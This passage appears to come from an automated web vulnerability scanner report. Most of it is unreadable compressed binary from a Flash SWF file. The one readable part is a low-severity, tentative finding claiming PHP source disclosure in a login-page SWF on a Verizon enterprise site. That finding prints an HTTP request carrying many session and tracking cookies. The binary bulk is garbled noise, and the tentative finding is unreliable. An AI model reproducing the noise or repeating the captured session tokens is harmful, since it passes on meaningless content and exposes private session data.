.....o[.M.I......#k...7q.....]..S.L..e...e.H...@...N..y..x.L5.x.ck.|......P..6..."t]s..g.Q....../.xcd...k.@....4m....&.7.)G b?2]r...Rne....w.w|[.gL........-.S-...Q+.2.8.n5..7s=R...D/..].^    ...j...4;...$.cI...F'....H...(....'.z..tHw..1D..S}..g!....k7P.TH....,..&.........p...^..|V-.......).c..X.b.=..L.*.M.4V...ahK..:._.........l..N..bc.O...I.......9..Gu..
.....u...S..._..{...F..:....\..e.u]M...Y.o.@....L."S.SZ.......34.....J.{,..%.K..$...}.ep.Z.>..LOs..X*4V....x*4SQ....:&.hK..!f..O.......Gle.gqP&9.....H.x...Z!..[...m.Ao.....^.7...V..GP..$..-...4.''...^w...2).U..Z.<3,T.Z....*..j..;.G...7..$&.-e......;."j|.`.E....&.E .( ..`..*..5v.q+.........hA.....!.....c.(3....'7m../.;p.*m#.. .....N..6/.^.C.....|Q..&W...5....c..e..Y~..A,FJ>).M./...*...!)...Bk.=Z.;......    .[.u0......fU.
S.J..w.j..]!#-...L....Bl..'Z....ZD...f...'.A.@...d.9...o..E...V5..Fj........7r.}......{+Tm..&.......kf\]..E..Y.^9.}.3(..m.<.w....R..7n$....$F..a..w/o..S..N.k..L..7..Yw.....{...4...C.p._f....|&+...T..uf....8']e..u.j.%.....6...U.....v....l..~....;..O...)~........X[>P...[.<..l.(.. .of!.P...R)}F...0.8(.........O..H....._.R
...O..H.......W.Ex..s./\.?..<]k......ZA..uD.O>..'...F.3.z.....e..........R6.n..R...Jg.$m....c.....Tw...?.S=../..
...? .......@.66....?d.....`..L.}]B.<Y....Y.....r.........l.
.b...O1c:`..N.
.7.+p0qmq.q.......P...1.)6....r W..,..q...\.v.:l..C....}..K...A..'@0{
...n...fN.8...%d.IQa.0....;[.o......L..(.N.."...3>Yr...2.->..=..~.Y.fs.&{x.1.C.a&.Q{..,........xW...?...g..59<.....]5.g.=..E.8...@...?..\...`.W.?..L..3...8L8.z.....fY..e.XX.....0.L.T...L..6..M_.<...Dr.*..v...P.._8.T..A...=`..Z..\.....#.V..KK`....M..... )....c^.6.g.\*..A8,..,.\T. ....]u....a...E~......H...o........s..)7..../.I.*....g....,pE8#kok......
...IFm...$pJO    ..M.#\..U.....*.
....V.........U.PKI.U.G.!.n+H.`....".{!3.....3..6tW...H%...;..    fN4...{~..=.....0...    |`R...(..|[l.]..?b.p[..%.45..j..b>.w.o..)..CK....K.#Q.j...v).2,........,.@O....O..;..`.w..2.//......?.........0....b......... C...TS..q.;...........`.HdH8....<t..}.....dJ....e.:...............\(.....l.....I..\..V.1.1o...._.. ..ho.g....k3P...&.5.4.q..............UY..=a....]...[.....2..q.e.j...u..H4..d...~z<>h..C.k..in.......|..%.5...f.....J............U.L,...|-].^.fjC.....:$a..xH.Jw...<.....4..`,......0.[.....<y.....o.Ykc...X..o...........l>H8......w.N........rc...m...hA.....j~..~k.    .......A....`...V.......
p..>d*.|...(...Y.....R..}.:..V.;f...R..J......w.)
.bB..%k;Y....!..I...`.,...m.K.h.9.^......??4..2.....L..R.+.?.....L......;.~.....~.>.:m......)L(..+p2}..q.!..    .S....I.?{#..s..E.    ...v]-.t..^6K.nE.X=.h;.
.I.qK...<{v...L.....4a.g..zO.-ZqdW.....}Di....~.\..%d.XM.D.n.....x.
.:?.....Fr{%...ro..    ..X.....@.0...J.V..hjT\...#..Wf}A.(...#._.....F
..![.p]-..5.../G.&.-........j...@Y6...kt.NBU..R...W.F...LM).8..T-..~....sp.M-.o.y_y......-.......f..H.h-J..._..9...!&U.?.....;..q.G...Qe$Ed.l=.&...8H..$...e....4...~.^.&.. ..n
...Yj.
?.........a..}.....T1d.6.q4c......)......j.0.._.&yp7..;..V.I[0.W.AE......(..=z....#..Di.... .F+.>.%.k.....W..\.....n*..*c....k=.....CKL.i....6.3V...*P.:p..8J.&.+.......>...h.m.....$8......+..>>....n>......q..m..S.j.j....`....a_.N.k6.*].@.<n<.....K.Y....:.D..0\aI.0......=W.[M.......r.,..N..*...y....Du....]...3W...J.EsM.......<...E.Kk...k....#....Gy....0.7.2.IX..%.. .L,.uJN..n..U....o....A...v....$t5.w..$.V.....(^...29\.SL..J.m\..dH...O...rl..5.    ...K.........W-]...jA.J#f.,..x.G......Co....J.a.0..../..v}.........`............'....~.?.....d..?2F....o.XV......0.R..j...........H....od,...o........o....._.#........"...f$.;:..s..O_.S..+..&..Qb|.RbJ^.!.....Y...YL\..m.9...x;..z:.(;..<.d.........gQpwg.W.?._G?G.@G.~.........h.    ^.......*......OT..l.|fT..n.E}VQ../.z....E.....L........bd......@    j.}.e...]......Lq.Y,..    .6...v\E.b<.]|>.s.}.:.).+.Vr.z...f...@P.. .........@3PjT}...>u./O.:...(..`....7.hzd#y......p{In......Gt.....,......B....y....'.&.....V../....ex.........&y......a<    .M8.H.;f..Tl.LH..u...hV.....D.`...r}.......Z.._....Z....1..4.`...............d@L...........(.V.KV.....j..=K........*L.....W.a.1.Q....t...0......&Y..--b....).(#.......MJ,-.|]..E8.K.?..4...!]...N..u5....u..=H......u4.D.)Qs...X..F.Hp.8..    5=...A..].....:}...NC..{...c7.m...%09.0.......j7.{e.......r."..`....8.....Z,2.*Lx..........s,.0Z .%r)p6..j_..l.n.].._.L..6p j&.E...NPyj...r.._..8.R`..:.....e.*.].c...W...N..a.t..Z.93.dLf.....+..D.$...7....E.._...Y.q....>s$y......J.+.......n.-.)Tl?...eM....i.^.K............/...&"......w9...k2J0.T.I..........nC]...k.X....Y{b..g..T.k~e...|....d.e......x....<.........|$    .......... +..L._Y.R3c.F...eQ.... ........'X(j.#.i.Z...T.2=.3.3K=.c..9##@C..".6.l.N...e..hZ.v._.........7..%H./.L_.eAAq.M.S.|.xO.|.....#vt.%G.w8....\.1.....k...A...T..DB......../....L..v\k%+
:eGl.^.#...#n.Qq.G1....G..K....n....<.R..%px(...P..tb..S....../..i..5...X..~E9... 4..M17...@|..60....p..q..R.8E..........K....D..f..6f5..?\!J.s.$.T...r
.hr...xC-\o|...=...k..E.N.....    .....C.L....;.....;.wKp.....f.W.^.{.s.}..v.;ZcP..Y...U.U......CWQ#=.%.X..~.E..L..x......G...|.B..UN.J.Q.L.......s%U@..hbTdU.....[...j.K..w-..Ux..^G2-..Ro...... .GZ.."...T..u.....(...G..?.xf.....8.5....fY..J...H..r.g..t.N0]...L.@............-........-t.....x.... .~........3;.X.........u....3RUbrS.{.....zl...R.U=.2~.y.Y....*.../ :..H......Q.......O.j.S...E..BT+!..).W..O]..i....al.l.T.....F..]...n).l.S.......D..+..O-.....U.......!...y.T..y..Q$..9...................#..)...@.h...h6..h.......!&_hH....@..............gNn....-..Z.8.;...[[8:.Z[.?70.<..>=3q......Z..?..?.`...g.ogj.....,mjeNK..>4t.o....AB$..r....G.t...QB~
~.?.?AGHA.UH.R.t.*......_....@?.    ...V..A.......9.9.....k._..!!.|.#..*......a.BE'..v..I..J.F2...=..)VC...A.......Z.....?.@.......'.H.p#...H. @.?#...J.J.T..GZ.....;.......~....2$....i.....
....._O|.a&?.....Dp.!H.;....7.I.;.O.(......E@......8.......-.?;.B..    .`.;..YG.L.    .a.`.?s=.*.
.e.
..x.    ....v.J.....e0.)..v!5pW...h.A...........o8.....pB,.........g._`1 ..|....0.!.......d..3 .....dB.....@^...0 ......H.........X..Q:....&    d...`..;..140u..`....v.v...AEB5A.@.<......R.t..NI.H...p...o.
...?..b0.. ..c%...J(....LK........ '..'.G>..b.P.._m8Q.B....n]t....V..K..n....=...}".j......]....$....;.J7..T.%..".U..T.........p..^.J.U....C......b..6..m..K....r.a.
...#(w.s.......D.S..6.3.../".q%A..>.|.Mg.C;..*.....f.l..t.a._.+.!.2.^....@0......)}...[..T>..........|S+.t..).H..].
|..`oc....w..l...d.t..".P.JOvY.;....9...5vW....w.zX|....}.b ..... gI..^e....t.V...lWpR.l['......7r.Q..H......e.....2..cZ..bY........\.^..
E.u]....Y......;C.K    ..#.Wz../..5.......a..Z.................NO........GF..`.Eb.X.`.`.......A.K0/+.<@.(X...`.\...X..7..d.p.v.. /:......O...\.....(c..1I.Pk.....r..t...R.}.T./*Ni..(._..VD..UD........?F./....?...o4gA.x.@.@...dp!.4UX.'.....CA... ^..........B..v.....?'.......B..............33{..f..og.B.......~....O....p[....b..T.
.0..!...?.G..z..{!..U...Z..\....n..H...._|.A.....R..'w..q.X....o.c.....%.....sk..E.....*...e....%.._)J    ...]...?,D..ls=ax.o.=..p....z......K;..?...F.....;.......o.d.?...../v..I.4.A!..;.?.y..d.....A...........7._.....g.k.3=.._..BB$@.$.......L`'..-..D&....A...X...S.P.FU...j.|..O..?|....?...|..Fe..N..J._...wTr.......d?......'..V.&..z6.....rfo.ga..v.7..............."...P..r..3.."DRLB....Q.An.................    .....r.......>..j@.~8....}.....bx...............O...].m.."....@Q...P0.P.]?h..a.....q! ..?..E...|....=.$P8(88XD88.
.0d..@.$.bA...Q...d..eS....R.e>z........S%.Uv.....?DP?....0..<.,..4".SA...
.........GM    ...@..$g.Q......e....xE..T..........=..[{..P` .1`0.!.....a.a....a..T.a.{.......|..*8..    F..._.=...`....q.eB:..t.........X......=.....Z...c5[...#.b.$....5\9}...].....c~..),[G......~.s..k3..[..T......a.]..;.. B|f...j.r..>....3j.....]*.p..    .....U[2n....I.....42....B^.'eR!..w...l...........r....V.."F....Haa;8..8.*....8.Liv....F.o...U..T..
...)...@..d.u...]..'2Ct.3y......(.G.Q6.....O+5EG.|....i..5..0...F{....d.....}G.`.v.1.u.Ld4.t....K..y.;...{...E..W;.(...A5./.......^..G...... ..m.Q`_..di.._...P'....VG..6..^......T......~.1..&..6.j4M.T:e.<.sOQ.e..uP8..Xc...U.|....Th.'s....3...+.:.6..b.Q.2.{49?G%...D.....pO.Y.a3.C.?>.h...Bq....v.j.7s...8..............w....,.....;...-... .L..5....D.5.;HxNO0Me.&....K...k..S.e.Iw..............Y?..N;H..d.?\RU.....X.Y....t.....2 .sJ..F}$....V....*>
...[SNIP]...

12.8. https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf previous next

Summary

Severity:	Low
Confidence:	Tentative
Host:	https://enterprisecenter.verizon.com
Path:	/enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf

Issue detail

The application appears to disclose some server-side source code written in PHP.

Request

GET /enterprisesolutions/Default/tiles/LoginFlash/swf/AB_heroGraphic_en.swf HTTP/1.1
Host: enterprisecenter.verizon.com
Connection: keep-alive
Referer: https://enterprisecenter.verizon.com/enterprisesolutions/Default/tiles/LoginFlash/vec_login_homepage_2010_preloader.swf
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: AkaUTrackingID=2EF56CE73C5AF5EC42EB764D612412CF; AkaSTrackingID=F002C16E2C0E27193BB48E08D6CA03F7; V347=0; GlobalSessionID=NES%2fpWJhBUqj3Wv6pct%2fhs3iw%3d%3d; HBXInitialVisit=Y; ReferenceSessionCookie=9/5/2011 6:15:59 PM; BTagRequired=N; lob=webmail; ONECMS_JSESSIONID=580zTlKQQs2ZXZn0jTJpTKD1zvC2pXZsPN78h5GKd2LS21dfkHD7!-1346721371; dtCookie=8C98328CB529EE605B41B254E42B3E4A; dtLatCT=1315279121983|1|297; dtSa=-; dtPC=G_1315279121513#_load_|G_1315279131706#_load_; dtLatC=157|173.5|1|297; BusinessUnit=residential; RegistrationApp=SessionId=f7b6c5b8-d3b0-4804-b482-0d60d28b823f; VZGEO=west; vsrecentsearches=oss%20sq~wss~xss~xss%20sq~; ED_SESSIONID=3lFzTlLPn3bjF74TvQ5hvTpG1NLZY6Ch55LynGnzjv4vbJTbpJTL!1857010759!-559043164; pref_lang=en-US; AIMSSESSIONID=12cTTlLQWJpG2WdmJ1n56z6lq4l7wM5TLkNq6z2RgpLJn697v8l1!-1788495886!154656592; AIMSPRESESSIONIDSIT=wJ75TlMM0FLQB8Bg9MqB6cJ9PPhDLLFCYyfFGZ3TqJLQN0GVvhMK!-1943483601!NONE; vzapps=ZIPCODE=10010; BPSPANISH=N; GBEOrdering=bannerid=vV8XV5a0k7UNCz0F4NS1Yy2ziu6e3G%2bpRnXX9Ts76mA%3d&redesignEnableFlag=YwUZzUxkyzg%3d&BundlesLP=is8rk0bMpSoz7R1F9vU7oNxRo1ehh781lEbxvp7l2Hs%3d; vzAppID=; LOB_CATEGORY=; CP=null*; TLTSID=90828BEED80D10D81818CE34DA2D2DF9; TLTUID=90828BEED80D10D81818CE34DA2D2DF9

Response

HTTP/1.1 200 OK
Server: Sun-ONE-Web-Server/6.1
Content-Type: text/plain
Last-Modified: Sun, 17 Jul 2011 07:09:35 GMT
ETag: W/"11c07-4e228aaf"
Vary: accept-encoding
Content-Length: 72711
Date: Mon, 05 Sep 2011 22:26:50 GMT
Connection: keep-alive

CWS
....x....X.].6|..))#...twJ...)..J#..tw+.t.H..........}...........\....Z.Z{....a....@qK.5...'.. .......l.Du.. ...n..._...>>..\\.....|..^.\<"""\..\...p..@7....7o:ZI...............me...#AK..m...?
...[SNIP]...
...m.G.L%.....7^...#.%......h......b^...R.r..i...:h.K..3.
...}E...]..4..a...6.p....I/.T.....=...
..N..|=G.T...F^.H\.vN.f,F....r.....L.7]....h...o..7..`.i..;......x..pfIp......`..).3*.d2.........K....<?...}.....    .*...3.#..kWdI...8...(\......C..D.9>..9`m....`.%.7.]...H|.kc......h.......W.e.%    ...0...@B..AE.1.j.%...$.T..."...@....,...2.Q.P..a....{f|.'#E_$C.@.Q.<b@6z..y%......Z.t...N4f`.{1q..eS....5n>!%.Z..3].
87...,/....z....;.......B ..r"L..2L"....,...b...4.g..T.N..g..........[B ...5.A..P...Uc&.(...=.m..=.%.b.XU.D.....u......k..B.[6.p.|HL..'...`......o.`..t2..^m&&..V..Z .o....HM........=;.~..J..?`._...........T.t......u.%..Hz....lUqhB....g...c...Dq1.(MT..wb.#/..L^....g.U...,...........^2.....m?R+H.uJ..}..T...
.. .. _Z.... .!+}.B..    .e.a/.Q...&.)}...1......s/."..`.eD....\..    ..*....}.,+.........b..0HL=.a..|...j..c....q.^.`...@Q_.@.ZHM|....?....d.'..2.xu..'.Bk,7Z.6.J..N.gQ.#...F...U..P..<.>8im..I#...S...0,..AAi~..<...0..31..........t....-..yq..>{..r.    ..@5    ..:R...b4[...!...&.Q..7m...2L3.'.Tl.K..*bX..v..5....~{7|.b.......?...V.5`...P......G..p.?................A@..>..|'.g..N.....    ...7......4W.........h......(..Y.?z\..*.e...d.O..?H.<.J..(].o..R.d.....`.S..}.J.g.....[#...{..)..rss.#...?.nu..}....e7.w/.w/+..-'D.....h.....zC...B}N]N..\..."./... ..    ....,..#,/............!.HA..........E..x...(..v...*.*..W......@..f}v:.......".. .-...................r.1.d...j.l....._...y'..;...$"2...T.......PI.E-..o&    ....t..p...8.....q..p..X....D..I.qq11.    .I.....$..."........b..OLJLJ...........Y...^.{..d$..$d..*2B||"2*.#..=#.!    .    #..BS......
.....`.0r.I.$..p..a..{.(........P.Q.Hh tx.....!..PP.....^...d|...<2..V...../..t.......FtO..Z{.E&..,#6.......9...^...w.B....]...?@..{.k[...wO..N..3.:M.%./......0u.y.I.+J..._U...6.....5.YW..P.S.;... .8.t...!....5../H.../.....f....|X..m.o..QR...%...#....#KM>....&.6M#.....(..,B....>.#..-.6...s#.FZc......S....p..GdJ`...5....y.f.jj...0...z.%rn.....**u.p.O.4...;w.R.....ww.v{.....mx..Y...3.....5o._=....VC..EV(1......8......A..1.K.....&LH..e.Q.t..}:.j....5.    .R..6.....>..    ....V.L.(I.5.^...e.a.f..L.e..t.......4.D:-Y.........i.v.L.<......29...vLa..4.......M.".*
.m...)...R.B.E....7{~..8.~....~.;T.v.....&n..GP..`.J..5yv.@w...=...p....5..YR1..$....../.T.O.......Q.....k.......Q...D&......J....$.z#..|.C...`y...nn.u#lj.E......O.7P.<.\.v..].Rc....h.......o.-.d.h.....)O.G
.A=H.b1.~OW...YJ..g...N.&.J.C.....C..LR.!i........d..........+jv....OC.B.:.p7...=fl.+H.o.....NP...6Lf.=\.....    .Lv9q>..chF..R.G;w.sn..?....`.*&[.X^..u.m....g.............I.......6z/q..W..x!...K.....G.L.V..3...)..>y...+....../. ..R:6.#{r%..]`.}m.Hs.    .....)).
.(mH
c+..(
..z..T...07..u.m_..K.....?s..Q...k.<....7..S..F<.T....5M.....&J..Q.U...K...c.{..8.e.....K3..h.G./...O/.Q.=..fq(|m..6..~.2Z. 5M.AjTs*.R=]|........Y..........N.=.....[.~m..J..$....x...}v.TSE..Q..TE[o-D...(..L...@.....t...>@...Xl..1.|!7MN=.....i.......-d.81.......7S.l....{0.0...Mt....+....b.\F...2...E~    Q...F.GJ..I....jo.gUM..~....hCh.....se+..D.e.F.q|...rl.....cTk..ax..p.;G_R.Hdn.^0.-...t.v,....+.....!..y...p.e.].k........E...........^gl.!....<D-A...    .6.^..m.K]...F...+@...............qka...E.........W......r.Z...Jt/m.y.}..9........R.\zgj.W..m..u.G.?.T...,\........'..:... ...!E.
E^%......n.p.
.3.....M...cQ3hcK.R...Gs}U.i.....`.N.!s%e...A...#...Bf..m....$..EP.!.liT..K..    ..$0...Y..}.~..Eb)j ...3.a.2mgH[...I...Q.sV....%.Ar...I.4lw.
..Fp.OV...p....r...Z!.... ...R~.[Pc..>......5....
../.*.O....wbc.w.."..B.74.@i.........2.`&7......ka..zg...3l...z.....Y...).d.......5.P..6.}..L.T.BI.Cg.....1.&..r._..3R..J7..{..e....G...W.H.....%...........'{[M}'i...Ok.hU...]..D.C(...?........Q.<i....E3.x"u<.qa.n_*....Q.E.....Q.\.....z.. .}.Xr.T.U...q..<.d/..v.X......4....@.8Q.w~...H..{z..;.;.......F.......:......?%;
...P......v.z..~..+./..0..l....4.,=x..'.*%u.+.....O.}..Ph...0nb.o..Ha....1......F7.........-k#e.Q.p.z..Zz...?......U.K.3....Q..}l.....E#{Tvb.g..Q......F.cb...p..fo........i.o.J.b...[....W.
.....[.f...{5......g4.}.{..?.!.i.)n.....S....6].t...T"...q..n./..d..t.5.    ....j0...%a.[...].....K.R!..._..>....AU...>|.+o..'....._.A..t
.....I.../
b.:G......l[..=T......_.m[....+.<...u?P.....Y..^.}v..\A..@L..6.....L}..H..`_.C.3.....e:........t.w.P...F[^.. ....H..._.2.'.h.=.\.......DKI...Q.,.k4......ht..
~..O....'x    ..|v....;...@G......dz...h...N./*L+..D..I......:...iv99...........0}....<...A.....j.8...m.A...S.(..z..3..h...=O}.Y.....}.W........h;....r..Ga...R...HO..Y9.......n$.$.....i*Z..L.j..J.Ze..~.t;m~..f.......fQ..........o_.8L0...Z....r...%.....DG.&..mx.J.+..c..^z2.s...bM.+......w..P.....Y..D..K.,.%Kd.B.`..N.DI.%..D!..U*b.2....5.....g.9..<......^....\.f..:.....~....u1.;...i..}.s7.......4M.UD..1H...nb?.%9..... X0...j+10nr0g].....o6.7}:...oU..er.h.O$~O:.5.#E...K
...#ul...6...=FNp..."....8M-P79.j...q].o....m..^]....f.....8...%..).$.....-}.....B........iDp....,vq.'...    .....    33..J.../..D.    ..B.E..q1.:P...~...........A..3...t..........tY.A..3QF!..r...k\9-..
.....*....a9).....9>.%su.ix..{...e.............J4.........8..@........A....RQ..iQ.....-....~..0m.....+...G...;..#n...^V%V-.%.zK}u...v..#R2$.~x.K..=b..6L3l...@O..8.JT .TaF    Fy_..8.W...t.(....f.#....JGY.t...z.
.5v...v....Qa.....t........=........s.r...
....uw&-.+..2%.6.^...P.wF.ea@..&.....0"...?n..!........h.....-.....a...Q...vg...V.......w}.{.Z.p.prQN.'.d..M...C..$...J.7.........d...8.;.&%.GBL...<.........N.M.M*.f..c.G&u...d...i..............!.&...[....c#A...IBFJ
%..4....Y{.>..+..MjZ.f.u......zF.k...'m.B..2../....rb.\.W.#.J..._.&.u-...W$....8F~.Q.........p.N...:..]/(.y......X.....T.._.>..*&/.M.j...s.....m...>..u.R.h....9..w"...S.....3.<L....+2.._.>.........Xx!.I....u%;;4......dQ[i.q.{.c...c...dKmI.f...v..Q{..$...8...&..T....||..M..M?..^.]..$S....4R....a......7..h....&3...dmE....&...<'-.2^.5JR....@..c";K.+w..e.d...    .N.:.&.83.5.......M.I%... .iq..C.CT..0..<..$.HZ.X...&.5.>.K.t..KYF....G1.....QrF....?MP..........j......'.....q)9.[.C&j)..kY..~8.n)..9^.G..<....6..........2.J...t.V.
...U3U.<...2..;./.t.r...=..G....70C.p.+?.LN.P.Y.O_.?....T..k...,.......qNT.....D.?.n.My..Z....!7.."...S..;BLU.w.V;.x....t.......:-.#.K+?..T.......h1..S.2..n~S......I.7...y.......R..I..i.
k..d...T...?Z..h....^.,^..(Ni..O./.....c..5cN...$f{52...z..\.. C'y..'....kM..Mg.(....~..8.;...}.._.g.nQ.>.Y.TX.f.k....|2./mn.).6..@r....q......C.<....M..E.)N.;AB*..=...K.%.r....,..(y.....E.}..u.    .+L.........8_v...........F..1e.}.$......7^.{.Z..D.S]....)..&Q5:
...x-.....O...?.7..m
....../..$......s.;#.C..w..*i_
."..F9.....d..t.!..m.R............7.
....t<..xc..eR..._.x{!V.....*%.ga%G..X..9..10.j..|L.OG.K.7.`....4..7x.....Z_.j...!_~.V.^...i.|;..G...^m...+6...z._._XQ.....    ]....u.(%..!..j..:.!wB..Zn.$4...=7.b..........-....e..{.&.a2.`..{.."~...:..v.......^^.;...e..O_Y.8xm<#s........J..)..I.H.Z..rD
..'..6.#.....E+..zu...).\.Y..3.9_^...O..\...%..]v....TXv.......5.JE.2-Y.!l$..A.........i.>.D\3.h....H.a.M..vA..?.....pA.....&{..}.............,......Rr...1...G...i...}agH[....(Z.e...D....'...l.....n......h.....e-...H..*./,...W.M.o&.?.?.........S0:....B.%.c..+..0....@.kt..b..>c....t...:'H.k...p=....N.;......Fp.........?-<.....W3.k....s,\..<.!@........e{O..+.<......v.X.W.8..Y..!.M.#.J..[4....4.....n..^...t{..6....a.......aw......Y......?.0.....S..v..X3.#...*B...q_......!.....H...PG....4.k~h):......v....:....".._....E.;(+:..RS...o_.a.$.VU+/ib...M..q.s9.....}a>.zB...T(,.q..6......f..bG.f....F9O.0ui.>...U..w.../.Kf.H..o..>.....Y....    .......u..F....(E...3....[Eb..0..q.+2.9.n.....4s...Kao}.....5..?...r....)5:.......,a..Xa$My.;t.r...m.g;.U.......bh.'..|.F..vx......+(...v...U...4...:......s........g?......u%U...^......dM^.......:.."Z8..~..u.......r^<K^.    3.#ob.fj...c..fw=.[}.Y..n.0....}.ow......%....,........d.2l'.4-P,.1yyI...o.v.\....G..........bM?.....j...... .o..R.8:.../c......%.....
eS.....].....]...
.....[|."..3...N....P...6....\)lN....'U...O-.d.s...?l....Y..A.&Co$i..MY-...-S.......'F......Uz.E.7(r._q.6.......I.........I./S..-Z..........w.,?.bK?.&6/qn.#Z!>..b.LJ...C>.<..\9s..........sf..u9U-o..<.......Xm.p{!..7L..].@.^.]`......2jd....@/...d5.>......._.|......-^O).g...y....y.....qV)..%..S...:E4E..?..uw..........x..
.....UZ...b......;O..^.>/.<.gD.E}g.l\...|.]E..../Rd
...u....{..OO<..F".6..9V..1.Jt    ..S0....A(...g#.Ya.?.~~.+...+..    .....3.....%.%....K..5.E..5..LD....\..w.s(....w.2#.h.....\.6...........VB..lzaE.,...W.Se.=....|(......(6V..u..6a.TP........,....<.O..&:....b.o.\........./(...[....0qv|..L;]].ja./.`....S!Q).3;....V.....{.m].fn..e......G..`.\.6/t......k....=.oQ..E..E..*.p./.*\Pv......O...=....$p.S%......g..........'.v.`.9..K.`.u..s.......Z.....A.@J\;.W....../17..^.%.aaK
.?

.
_...V....K.|{K..0&>..h...TB.....awh......<...d.... .]B .&....+..2==7....1....F..L.&..)...M[#......k.%........5..<.:.-I.fL.....*u.f..3......l...gf.gSl$...I......Z...H..P.2.y..E...I...H....`.!k...#eI..0g....1t.a.D../.W.Ej.......t..$.....5*&].]w7Y=U[..4.....U.x    ....NK.k]..t......q._..'_hG!..8|>...&KPR.$..=...`s^....D..x...m.k.j.uE....[...h....X+Q..q/6.....q.?..1E*._z...I)..xxm....D...xNn`:O.^.Kq..4f...q........E..c..b(.V....~.|...}.....26z...B....2.G.....................v..MS. }..T[...O.9..jA.cJ.`....a.0.F._Ls    .....`..ZY.y;WOw......z...T.....Q.;...
.$W.%*...)...1.u.B.hV.o].pj.5...6.IMY.....>.a....r..Q...7u...h...r......>...?..I=a$...c......'.$UsW...X.m`.]...r..../.S...q.. ..7N.ZJ!.d    .<....7.$.#`|p....<.,.Q.P|...=..?.%.....|..9v.....q.r.`..t..}zd..oXY...K...li..H....V........,P.)p.|...t.:*..K..A....F...[
.~&o...s2O;.w..X.P$y...5u'.]10.<B.;....;~|....J.Z......Y9..>..4"j.z..S..Y.g..W.K...............u.i.wK.....5.z.R..;..z.......j.7S~..u....%"...f....:..Nw)...Z5T*.....<[?r.{....hj..Fr....|.....g,Yw..G:..z..n,}-#oYxw+..4..%...-.....m#.2.b...:..i.`.!uZ.u...N>.|._...c....&.|.Q...J.....I7#8..<....[{.....IxT....3.<8Q:.'..m......P.&..~.....    ...#"..c....,L.....6.*..8...........4..F|;$yZK2M.a...v1..m.R....:Q...x.n}....c.I.M1.$.u.'.....=~.......x?q._...%.....4 .u|..........%.....h...,...z.........%)V.L.[.pc.^..+V...6.kjB......C...|...q..hP/.]...#V6;DK.3V..p....c....w..J....h.Y...*.].{.Wi.6...M.....e.^...../..s.:..Y|.3.f.Q.Q    ..,...s...r;.......T..,GRu....3h.E#.......Ei.....S.>K.d..|B.9...C.../.[..*..U.c:3..%j87....0;.(E..6q%(.-.Lh... ".'^..p...V....LNirh. .SD...oF.....Ld/N.^....:2.z...e..s...ZIcG.W..+."...r,...&2..8#z..N....'Y.......;.....ex[.h...T.R..........^.eL..<...y...r.W..,x..~B2]?...(.]........QgvlrR].~M........&.lv.z.~..e.MGy.....U.?....=.rj^....r..o...S.......x&
..g......`.9..8...*..M.Y)..1.p.O.:*.......Q.N_E.....;-o..5..9....5..'.a.R.\:.....?.l...+..Gn.}5...>..4.......o..)....    6$..OS.;.x.i.Xz..._}.t.Z....Zo....A..lA...|?a..~.?.......4s<ns.....    e)+_......ONY-.'.L.E....Y.q.vL...1.)F...e.}...P.S.:.h.....>..~.......NVIp.;..>Y..O.....D..k...j.CDP.#/.............=...G#......q<.V.<.]w.u..S..........?...+....U..Y`..;...2.1X..<.'3r...I...p&...`.7./. ..V..6.....""C.."~.@..m..v4..h.o.J....7.c.H....d4*.UeP...#.bo.....!:..."...?.!.".V{O|w.mH..r..?j...r.]..g.......I.>..R.......=.9...fV.>z?.X.Mc...'..t~4........F.....'..'...._.a..i.v6....D.+.F3...H...-...y..J3$9.d...l.).....~...(.WB..:\&,...F.....a.Y..cN.*.'.....P..(...9504\p......K..~..xVx.S.Y.q...]
..k..Ot......*.K..K...F.....A.....|,.,.........H...!.hu...CF_..1..8.w#.............e..G.E.V..l..kl..w..4....'.X....^........i._...5...i./.3...P........]...}N...W*..BW.Vd.h.`H...7..\u......
S^.?~...$...rI...g...T.........0.{......i?>..1J.. .r..[4.y...6..^..[,..?.O.|e..X..%...i.:.Q..d.k..\....2.S7..    .H.29..P...0.Y0..:..hi"..Fs0%~..a..`_M.Z:f.w.iC...E....~...x8...).....hIf......#:.fD.."..C....*.%Q..i....{;X......*.Z&=p.....5..._..9.
...[SNIP]...
<.......a@...%8.6.4.......k|....../-..g2[$........Za.<?wk..w.l.;m..c.............cm.).Rd.C.p......<......[..+..E......2-|..g.....y.q.Kb....-...$5....#.xNs.%X.....
.%.M.....FF.gB_.Xm.[].......g....5u?....o....s..g|...H.K..........`!.......|$..;.X.B.N..j.......;\+.\U1.yvu{!A..t....N.H..@:6.._Q..........Z.....A....V.....\..\..gC[e.jj..Hf......yvr.G4N.d...l!g..,d.....Nh.../m....G{F.QX..97(....{.+.E..... ..pB...............S`...D...BJ.m..,..|G.p..a0..=;...1.~...kd...q...c....    (...87.z{.A..e.#x.*&#.vn.I"8tWG.,...N..N...x.4.Q...7Eo.c$    ..1.t...j.....i;...[......l..........w.    .vW..,........Z..B.3J.b{[Y...z.$.?R...F..CZ..!..:    .a.il.......#C.........
%.x...G^.....\..n.4~....=hK4.PB'.{.r...(.kY..HN~..Z:........g.......S1.y...^b.../.......
.LH.UQ....>.} ..8.....Hh7nW[.c......Z.$G.3d.3s...+\.G......k....%.V..Rg@U^......(...&e5.=sl"6k.?....^...s..>....E...!....k..[.B...?. CwYpa.\7....&h..A{Xs..m....5..k.YTU...8K
yE79m...6./@;T1.y.w.H_3    h.......2.e....*.k.../l.T...s...D4..o.mondTER..Y......r...$U.W# .+. ...;.._.ym.o....Z..v.]..Pg.-......}.....s...D;.ii......_xQ`-.]{....Hj.._.XX.-....Ub...>..    .TgNg[43.c'.#V>Ws...l.BY.,5./r
